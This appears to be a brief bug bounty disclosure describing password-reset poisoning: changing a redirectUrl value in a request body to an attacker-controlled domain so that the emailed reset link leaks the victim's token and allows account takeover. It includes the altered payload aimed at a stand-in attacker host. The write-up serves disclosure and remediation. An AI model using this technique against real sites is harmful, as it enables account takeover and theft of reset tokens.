The impact is similar to host header injection. In this particular case, the payload was passed in the request body. By default, the body request was set as {"redirectUrl": "https://hackerone.com/{token}"}. However, I modified it to {"redirectUrl": "https://attackcontroledsite.com/{}"}.

When the modified request is sent via email, it appears as "attackercontroledsite.com/thisisrandbutsecret_token" (to reset the password). Once the victim clicks on the link, the attacker obtains the reset token. By replacing the token with the appropriate host, i.e., "hackerone.com/resetoken," the attacker can take over the account.